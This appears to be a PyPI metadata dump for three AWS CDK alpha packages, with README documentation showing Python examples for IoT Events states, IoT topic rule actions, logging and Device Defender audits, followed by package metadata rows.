Model: ```python # Example automatically generated from non-compiling source. May contain errors. online = iotevents.State( state_name="Online", on_enter=[{ "event_name": "enter-event", "condition": iotevents.Expression.current_input(input), "actions": [ actions.SetTimerAction("MyTimer", duration=cdk.Duration.seconds(60) ) ] }], on_input=[{ "event_name": "input-event", "condition": iotevents.Expression.current_input(input), "actions": [ actions.ResetTimerAction("MyTimer") ] }], on_exit=[{ "event_name": "exit-event", "actions": [ actions.ClearTimerAction("MyTimer") ] }] ) offline = iotevents.State(state_name="Offline") online.transition_to(offline, when=iotevents.Expression.timeout("MyTimer")) offline.transition_to(online, when=iotevents.Expression.current_input(input)) ``` ## Set variable to detector instance The code snippet below creates an Action that set variable to detector instance when it is triggered. ```python import aws_cdk.aws_iotevents_alpha as iotevents import aws_cdk.aws_iotevents_actions_alpha as actions # input: iotevents.IInput state = iotevents.State( state_name="MyState", on_enter=[iotevents.Event( event_name="test-event", condition=iotevents.Expression.current_input(input), actions=[ actions.SetVariableAction("MyVariable", iotevents.Expression.input_attribute(input, "payload.temperature")) ] )] ) ``` ## Invoke a Lambda function The code snippet below creates an Action that invoke a Lambda function when it is triggered. ```python import aws_cdk.aws_iotevents_alpha as iotevents import aws_cdk.aws_iotevents_actions_alpha as actions import aws_cdk.aws_lambda as lambda_ # input: iotevents.IInput # func: lambda.IFunction state = iotevents.State( state_name="MyState", on_enter=[iotevents.Event( event_name="test-event", condition=iotevents.Expression.current_input(input), actions=[actions.LambdaInvokeAction(func)] )] ) ```
text/markdown
Amazon Web Services
null
null
null
Apache-2.0
null
[ "Intended Audience :: Developers", "Operating System :: OS Independent", "Programming Language :: JavaScript", "Programming Language :: Python :: 3 :: Only", "Programming Language :: Python :: 3.9", "Programming Language :: Python :: 3.10", "Programming Language :: Python :: 3.11", "Typing :: Typed", ...
[]
https://github.com/aws/aws-cdk
null
~=3.9
[]
[]
[]
[ "aws-cdk-lib<3.0.0,>=2.239.0", "aws-cdk.aws-iotevents-alpha==2.239.0.a0", "constructs<11.0.0,>=10.5.0", "jsii<2.0.0,>=1.126.0", "publication>=0.0.3", "typeguard==2.13.3" ]
[]
[]
[]
[ "Source, https://github.com/aws/aws-cdk.git" ]
twine/6.2.0 CPython/3.11.14
2026-02-19T21:58:05.644629
aws_cdk_aws_iotevents_actions_alpha-2.239.0a0.tar.gz
53,936
95/ae/32bc804a852f0cb1d56615fa0c3377d4125e0c8b407fc9619b132b5502ab/aws_cdk_aws_iotevents_actions_alpha-2.239.0a0.tar.gz
source
sdist
null
false
eccb8c95dba9f8784d48655a085dcb9b
6dc5fba6054b971938447b44a359a3fa6693fd0da92d0414efcb412ccc72b030
95ae32bc804a852f0cb1d56615fa0c3377d4125e0c8b407fc9619b132b5502ab
null
[]
0
2.1
aws-cdk.aws-iot-alpha
2.239.0a0
The CDK Construct Library for AWS::IoT
# AWS IoT Construct Library <!--BEGIN STABILITY BANNER-->--- ![cdk-constructs: Experimental](https://img.shields.io/badge/cdk--constructs-experimental-important.svg?style=for-the-badge) > The APIs of higher level constructs in this module are experimental and under active development. > They are subject to non-backward compatible changes or removal in any future version. These are > not subject to the [Semantic Versioning](https://semver.org/) model and breaking changes will be > announced in the release notes. This means that while you may use them, you may need to update > your source code when upgrading to a newer version of this package. --- <!--END STABILITY BANNER--> AWS IoT Core lets you connect billions of IoT devices and route trillions of messages to AWS services without managing infrastructure. ## `TopicRule` Create a topic rule that give your devices the ability to interact with AWS services. You can create a topic rule with an action that invoke the Lambda action as following: ```python func = lambda_.Function(self, "MyFunction", runtime=lambda_.Runtime.NODEJS_LATEST, handler="index.handler", code=lambda_.Code.from_inline(""" exports.handler = (event) => { console.log("It is test for lambda action of AWS IoT Rule.", event); };""") ) iot.TopicRule(self, "TopicRule", topic_rule_name="MyTopicRule", # optional description="invokes the lambda function", # optional sql=iot.IotSql.from_string_as_ver20160323("SELECT topic(2) as device_id, timestamp() as timestamp FROM 'device/+/data'"), actions=[actions.LambdaFunctionAction(func)] ) ``` Or, you can add an action after constructing the `TopicRule` instance as following: ```python # func: lambda.Function topic_rule = iot.TopicRule(self, "TopicRule", sql=iot.IotSql.from_string_as_ver20160323("SELECT topic(2) as device_id, timestamp() as timestamp FROM 'device/+/data'") ) topic_rule.add_action(actions.LambdaFunctionAction(func)) ``` You can also supply `errorAction` as following, and the IoT Rule will trigger it if a rule's action is unable to perform: ```python import aws_cdk.aws_logs as logs log_group = logs.LogGroup(self, "MyLogGroup") iot.TopicRule(self, "TopicRule", sql=iot.IotSql.from_string_as_ver20160323("SELECT topic(2) as device_id, timestamp() as timestamp FROM 'device/+/data'"), error_action=actions.CloudWatchLogsAction(log_group) ) ``` If you wanna make the topic rule disable, add property `enabled: false` as following: ```python iot.TopicRule(self, "TopicRule", sql=iot.IotSql.from_string_as_ver20160323("SELECT topic(2) as device_id, timestamp() as timestamp FROM 'device/+/data'"), enabled=False ) ``` See also [@aws-cdk/aws-iot-actions-alpha](https://docs.aws.amazon.com/cdk/api/v2/docs/aws-iot-actions-alpha-readme.html) for other actions. ## Logging AWS IoT provides a [logging feature](https://docs.aws.amazon.com/iot/latest/developerguide/configure-logging.html) that allows you to monitor and log AWS IoT activity. You can enable IoT logging with the following code: ```python iot.Logging(self, "Logging", log_level=iot.LogLevel.INFO ) ``` **Note**: All logs are forwarded to the `AWSIotLogsV2` log group in CloudWatch. ## Audit An [AWS IoT Device Defender audit looks](https://docs.aws.amazon.com/iot-device-defender/latest/devguide/device-defender-audit.html) at account- and device-related settings and policies to ensure security measures are in place. An audit can help you detect any drifts from security best practices or access policies. ### Account Audit Configuration The IoT audit includes [various audit checks](https://docs.aws.amazon.com/iot-device-defender/latest/devguide/device-defender-audit-checks.html), and it is necessary to configure settings to enable those checks. You can enable an account audit configuration with the following code: ```python # Audit notification are sent to the SNS topic # target_topic: sns.ITopic iot.AccountAuditConfiguration(self, "AuditConfiguration", target_topic=target_topic ) ``` By default, all audit checks are enabled, but it is also possible to enable only specific audit checks. ```python iot.AccountAuditConfiguration(self, "AuditConfiguration", check_configuration=iot.CheckConfiguration( # enabled authenticated_cognito_role_overly_permissive_check=True, # enabled by default ca_certificate_expiring_check=undefined, # disabled ca_certificate_key_quality_check=False, conflicting_client_ids_check=False, device_certificate_age_check=False, device_certificate_expiring_check=False, device_certificate_key_quality_check=False, device_certificate_shared_check=False, intermediate_ca_revoked_for_active_device_certificates_check=False, io_tPolicy_potential_mis_configuration_check=False, iot_policy_overly_permissive_check=False, iot_role_alias_allows_access_to_unused_services_check=False, iot_role_alias_overly_permissive_check=False, logging_disabled_check=False, revoked_ca_certificate_still_active_check=False, revoked_device_certificate_still_active_check=False, unauthenticated_cognito_role_overly_permissive_check=False ) ) ``` To configure [the device certificate age check](https://docs.aws.amazon.com/iot-device-defender/latest/devguide/device-certificate-age-check.html), you can specify the duration for the check: ```python from aws_cdk import Duration iot.AccountAuditConfiguration(self, "AuditConfiguration", check_configuration=iot.CheckConfiguration( device_certificate_age_check=True, # The default value is 365 days # Valid values range from 30 days (minimum) to 3650 days (10 years, maximum) device_certificate_age_check_duration=Duration.days(365) ) ) ``` ### Scheduled Audit You can create a [scheduled audit](https://docs.aws.amazon.com/iot-device-defender/latest/devguide/AuditCommands.html#device-defender-AuditCommandsManageSchedules) that is run at a specified time interval. Checks must be enabled for your account by creating `AccountAuditConfiguration`. ```python # config: iot.AccountAuditConfiguration # Daily audit daily_audit = iot.ScheduledAudit(self, "DailyAudit", account_audit_configuration=config, frequency=iot.Frequency.DAILY, audit_checks=[iot.AuditCheck.AUTHENTICATED_COGNITO_ROLE_OVERLY_PERMISSIVE_CHECK ] ) # Weekly audit weekly_audit = iot.ScheduledAudit(self, "WeeklyAudit", account_audit_configuration=config, frequency=iot.Frequency.WEEKLY, day_of_week=iot.DayOfWeek.SUNDAY, audit_checks=[iot.AuditCheck.CA_CERTIFICATE_EXPIRING_CHECK ] ) # Monthly audit monthly_audit = iot.ScheduledAudit(self, "MonthlyAudit", account_audit_configuration=config, frequency=iot.Frequency.MONTHLY, day_of_month=iot.DayOfMonth.of(1), audit_checks=[iot.AuditCheck.CA_CERTIFICATE_KEY_QUALITY_CHECK ] ) ```
text/markdown
Amazon Web Services
null
null
null
Apache-2.0
null
[ "Intended Audience :: Developers", "Operating System :: OS Independent", "Programming Language :: JavaScript", "Programming Language :: Python :: 3 :: Only", "Programming Language :: Python :: 3.9", "Programming Language :: Python :: 3.10", "Programming Language :: Python :: 3.11", "Typing :: Typed", ...
[]
https://github.com/aws/aws-cdk
null
~=3.9
[]
[]
[]
[ "aws-cdk-lib<3.0.0,>=2.239.0", "constructs<11.0.0,>=10.5.0", "jsii<2.0.0,>=1.126.0", "publication>=0.0.3", "typeguard==2.13.3" ]
[]
[]
[]
[ "Source, https://github.com/aws/aws-cdk.git" ]
twine/6.2.0 CPython/3.11.14
2026-02-19T21:58:03.527597
aws_cdk_aws_iot_alpha-2.239.0a0.tar.gz
118,508
11/4e/485289765ab87e491beecff01ec3de54ac1db7410438773d744f49fe9a11/aws_cdk_aws_iot_alpha-2.239.0a0.tar.gz
source
sdist
null
false
8d6382189e8fd183e3106dd1afbd98bf
184938c599e0d1fa848d05a1660d18d1de145190011624bddd9e613f8427b288
114e485289765ab87e491beecff01ec3de54ac1db7410438773d744f49fe9a11
null
[]
0
2.1
aws-cdk.aws-iot-actions-alpha
2.239.0a0
Receipt rule actions for AWS IoT
# Actions for AWS IoT Rule <!--BEGIN STABILITY BANNER-->--- ![cdk-constructs: Experimental](https://img.shields.io/badge/cdk--constructs-experimental-important.svg?style=for-the-badge) > The APIs of higher level constructs in this module are experimental and under active development. > They are subject to non-backward compatible changes or removal in any future version. These are > not subject to the [Semantic Versioning](https://semver.org/) model and breaking changes will be > announced in the release notes. This means that while you may use them, you may need to update > your source code when upgrading to a newer version of this package. --- <!--END STABILITY BANNER--> This library contains integration classes to send data to any number of supported AWS Services. Instances of these classes should be passed to `TopicRule` defined in `aws-cdk-lib/aws-iot`. Currently supported are: * Republish a message to another MQTT topic * Invoke a Lambda function * Put objects to a S3 bucket * Put logs to CloudWatch Logs * Capture CloudWatch metrics * Change state for a CloudWatch alarm * Put records to Kinesis Data stream * Put records to Amazon Data Firehose stream * Send messages to SQS queues * Publish messages on SNS topics * Write messages into columns of DynamoDB * Put messages IoT Events input * Send messages to HTTPS endpoints ## Republish a message to another MQTT topic The code snippet below creates an AWS IoT Rule that republish a message to another MQTT topic when it is triggered. ```python iot.TopicRule(self, "TopicRule", sql=iot.IotSql.from_string_as_ver20160323("SELECT topic(2) as device_id, timestamp() as timestamp, temperature FROM 'device/+/data'"), actions=[ actions.IotRepublishMqttAction("${topic()}/republish", quality_of_service=actions.MqttQualityOfService.AT_LEAST_ONCE ) ] ) ``` ## Invoke a Lambda function The code snippet below creates an AWS IoT Rule that invoke a Lambda function when it is triggered. ```python func = lambda_.Function(self, "MyFunction", runtime=lambda_.Runtime.NODEJS_LATEST, handler="index.handler", code=lambda_.Code.from_inline(""" exports.handler = (event) => { console.log("It is test for lambda action of AWS IoT Rule.", event); };""") ) iot.TopicRule(self, "TopicRule", sql=iot.IotSql.from_string_as_ver20160323("SELECT topic(2) as device_id, timestamp() as timestamp, temperature FROM 'device/+/data'"), actions=[actions.LambdaFunctionAction(func)] ) ``` ## Put objects to a S3 bucket The code snippet below creates an AWS IoT Rule that puts objects to a S3 bucket when it is triggered. ```python bucket = s3.Bucket(self, "MyBucket") iot.TopicRule(self, "TopicRule", sql=iot.IotSql.from_string_as_ver20160323("SELECT topic(2) as device_id FROM 'device/+/data'"), actions=[actions.S3PutObjectAction(bucket)] ) ``` The property `key` of `S3PutObjectAction` is given the value `${topic()}/${timestamp()}` by default. This `${topic()}` and `${timestamp()}` is called Substitution templates. For more information see [this documentation](https://docs.aws.amazon.com/iot/latest/developerguide/iot-substitution-templates.html). In above sample, `${topic()}` is replaced by a given MQTT topic as `device/001/data`. And `${timestamp()}` is replaced by the number of the current timestamp in milliseconds as `1636289461203`. So if the MQTT broker receives an MQTT topic `device/001/data` on `2021-11-07T00:00:00.000Z`, the S3 bucket object will be put to `device/001/data/1636243200000`. You can also set specific `key` as following: ```python bucket = s3.Bucket(self, "MyBucket") iot.TopicRule(self, "TopicRule", sql=iot.IotSql.from_string_as_ver20160323("SELECT topic(2) as device_id, year, month, day FROM 'device/+/data'"), actions=[ actions.S3PutObjectAction(bucket, key="${year}/${month}/${day}/${topic(2)}" ) ] ) ``` If you wanna set access control to the S3 bucket object, you can specify `accessControl` as following: ```python bucket = s3.Bucket(self, "MyBucket") iot.TopicRule(self, "TopicRule", sql=iot.IotSql.from_string_as_ver20160323("SELECT * FROM 'device/+/data'"), actions=[ actions.S3PutObjectAction(bucket, access_control=s3.BucketAccessControl.PUBLIC_READ ) ] ) ``` ## Put logs to CloudWatch Logs The code snippet below creates an AWS IoT Rule that puts logs to CloudWatch Logs when it is triggered. ```python import aws_cdk.aws_logs as logs log_group = logs.LogGroup(self, "MyLogGroup") iot.TopicRule(self, "TopicRule", sql=iot.IotSql.from_string_as_ver20160323("SELECT topic(2) as device_id FROM 'device/+/data'"), actions=[actions.CloudWatchLogsAction(log_group)] ) ``` ## Capture CloudWatch metrics The code snippet below creates an AWS IoT Rule that capture CloudWatch metrics when it is triggered. ```python topic_rule = iot.TopicRule(self, "TopicRule", sql=iot.IotSql.from_string_as_ver20160323("SELECT topic(2) as device_id, namespace, unit, value, timestamp FROM 'device/+/data'"), actions=[ actions.CloudWatchPutMetricAction( metric_name="${topic(2)}", metric_namespace="${namespace}", metric_unit="${unit}", metric_value="${value}", metric_timestamp="${timestamp}" ) ] ) ``` ## Start Step Functions State Machine The code snippet below creates an AWS IoT Rule that starts a Step Functions State Machine when it is triggered. ```python state_machine = stepfunctions.StateMachine(self, "SM", definition_body=stepfunctions.DefinitionBody.from_chainable(stepfunctions.Wait(self, "Hello", time=stepfunctions.WaitTime.duration(Duration.seconds(10)))) ) iot.TopicRule(self, "TopicRule", sql=iot.IotSql.from_string_as_ver20160323("SELECT * FROM 'device/+/data'"), actions=[ actions.StepFunctionsStateMachineAction(state_machine) ] ) ``` ## Change the state of an Amazon CloudWatch alarm The code snippet below creates an AWS IoT Rule that changes the state of an Amazon CloudWatch alarm when it is triggered: ```python import aws_cdk.aws_cloudwatch as cloudwatch metric = cloudwatch.Metric( namespace="MyNamespace", metric_name="MyMetric", dimensions_map={"MyDimension": "MyDimensionValue"} ) alarm = cloudwatch.Alarm(self, "MyAlarm", metric=metric, threshold=100, evaluation_periods=3, datapoints_to_alarm=2 ) topic_rule = iot.TopicRule(self, "TopicRule", sql=iot.IotSql.from_string_as_ver20160323("SELECT topic(2) as device_id FROM 'device/+/data'"), actions=[ actions.CloudWatchSetAlarmStateAction(alarm, reason="AWS Iot Rule action is triggered", alarm_state_to_set=cloudwatch.AlarmState.ALARM ) ] ) ``` ## Put records to Kinesis Data stream The code snippet below creates an AWS IoT Rule that puts records to Kinesis Data stream when it is triggered. ```python import aws_cdk.aws_kinesis as kinesis stream = kinesis.Stream(self, "MyStream") topic_rule = iot.TopicRule(self, "TopicRule", sql=iot.IotSql.from_string_as_ver20160323("SELECT * FROM 'device/+/data'"), actions=[ actions.KinesisPutRecordAction(stream, partition_key="${newuuid()}" ) ] ) ``` ## Put records to Amazon Data Firehose stream The code snippet below creates an AWS IoT Rule that puts records to Put records to Amazon Data Firehose stream when it is triggered. ```python import aws_cdk.aws_kinesisfirehose as firehose bucket = s3.Bucket(self, "MyBucket") stream = firehose.DeliveryStream(self, "MyStream", destination=firehose.S3Bucket(bucket) ) topic_rule = iot.TopicRule(self, "TopicRule", sql=iot.IotSql.from_string_as_ver20160323("SELECT * FROM 'device/+/data'"), actions=[ actions.FirehosePutRecordAction(stream, batch_mode=True, record_separator=actions.FirehoseRecordSeparator.NEWLINE ) ] ) ``` ## Send messages to an SQS queue The code snippet below creates an AWS IoT Rule that send messages to an SQS queue when it is triggered: ```python import aws_cdk.aws_sqs as sqs queue = sqs.Queue(self, "MyQueue") topic_rule = iot.TopicRule(self, "TopicRule", sql=iot.IotSql.from_string_as_ver20160323("SELECT topic(2) as device_id, year, month, day FROM 'device/+/data'"), actions=[ actions.SqsQueueAction(queue, use_base64=True ) ] ) ``` ## Publish messages on an SNS topic The code snippet below creates and AWS IoT Rule that publishes messages to an SNS topic when it is triggered: ```python import aws_cdk.aws_sns as sns topic = sns.Topic(self, "MyTopic") topic_rule = iot.TopicRule(self, "TopicRule", sql=iot.IotSql.from_string_as_ver20160323("SELECT topic(2) as device_id, year, month, day FROM 'device/+/data'"), actions=[ actions.SnsTopicAction(topic, message_format=actions.SnsActionMessageFormat.JSON ) ] ) ``` ## Write attributes of a message to DynamoDB The code snippet below creates an AWS IoT rule that writes all or part of an MQTT message to DynamoDB using the DynamoDBv2 action. ```python import aws_cdk.aws_dynamodb as dynamodb # table: dynamodb.Table topic_rule = iot.TopicRule(self, "TopicRule", sql=iot.IotSql.from_string_as_ver20160323("SELECT * FROM 'device/+/data'"), actions=[ actions.DynamoDBv2PutItemAction(table) ] ) ``` ## Put messages IoT Events input The code snippet below creates an AWS IoT Rule that puts messages to an IoT Events input when it is triggered: ```python import aws_cdk.aws_iotevents_alpha as iotevents import aws_cdk.aws_iam as iam # role: iam.IRole input = iotevents.Input(self, "MyInput", attribute_json_paths=["payload.temperature", "payload.transactionId"] ) topic_rule = iot.TopicRule(self, "TopicRule", sql=iot.IotSql.from_string_as_ver20160323("SELECT * FROM 'device/+/data'"), actions=[ actions.IotEventsPutMessageAction(input, batch_mode=True, # optional property, default is 'false' message_id="${payload.transactionId}", # optional property, default is a new UUID role=role ) ] ) ``` ## Send Messages to HTTPS Endpoints The code snippet below creates an AWS IoT Rule that sends messages to an HTTPS endpoint when it is triggered: ```python topic_rule = iot.TopicRule(self, "TopicRule", sql=iot.IotSql.from_string_as_ver20160323("SELECT topic(2) as device_id, year, month, day FROM 'device/+/data'") ) topic_rule.add_action( actions.HttpsAction("https://example.com/endpoint", confirmation_url="https://example.com", headers=[actions.HttpActionHeader(key="key0", value="value0"), actions.HttpActionHeader(key="key1", value="value1") ], auth=actions.HttpActionSigV4Auth(service_name="serviceName", signing_region="us-east-1") )) ``` You can enable batching to reduce costs and improve efficiency: ```python from aws_cdk import Size # topic_rule: iot.TopicRule topic_rule.add_action( actions.HttpsAction("https://example.com/endpoint", batch_config=actions.HttpActionBatchConfig( max_batch_open_duration=Duration.millis(100), max_batch_size=5, max_batch_size_bytes=Size.kibibytes(1) ) )) ``` For more information about the batching configuration, see the [AWS IoT Core documentation](https://docs.aws.amazon.com/iot/latest/developerguide/http_batching.html). ## Write Data to Open Search Service The code snippet below creates an AWS IoT Rule that writes data to an Open Search Service when it is triggered: ```python import aws_cdk.aws_opensearchservice as opensearch # domain: opensearch.Domain topic_rule = iot.TopicRule(self, "TopicRule", sql=iot.IotSql.from_string_as_ver20160323("SELECT topic(2) as device_id, year, month, day FROM 'device/+/data'") ) topic_rule.add_action(actions.OpenSearchAction(domain, id="my-id", index="my-index", type="my-type" )) ```
text/markdown
Amazon Web Services
null
null
null
Apache-2.0
null
[ "Intended Audience :: Developers", "Operating System :: OS Independent", "Programming Language :: JavaScript", "Programming Language :: Python :: 3 :: Only", "Programming Language :: Python :: 3.9", "Programming Language :: Python :: 3.10", "Programming Language :: Python :: 3.11", "Typing :: Typed", ...
[]
https://github.com/aws/aws-cdk
null
~=3.9
[]
[]
[]
[ "aws-cdk-lib<3.0.0,>=2.239.0", "aws-cdk.aws-iot-alpha==2.239.0.a0", "aws-cdk.aws-iotevents-alpha==2.239.0.a0", "constructs<11.0.0,>=10.5.0", "jsii<2.0.0,>=1.126.0", "publication>=0.0.3", "typeguard==2.13.3" ]
[]
[]
[]
[ "Source, https://github.com/aws/aws-cdk.git" ]
twine/6.2.0 CPython/3.11.14
2026-02-19T21:58:02.667772
aws_cdk_aws_iot_actions_alpha-2.239.0a0.tar.gz
127,363
27/b3/bd9d758b2db5273857b7ee2dc94033aaaa62ebf332317236108a75086fc1/aws_cdk_aws_iot_actions_alpha-2.239.0a0.tar.gz
source
sdist
null
false
ddffd05c56079ff5e2cfc99e197220db
7ecd96917283627fb646bb06b05fcaa8f5ed0a77d3715052bd488754ba274c28
27b3bd9d758b2db5273857b7ee2dc94033aaaa62ebf332317236108a75086fc1
null
[]
0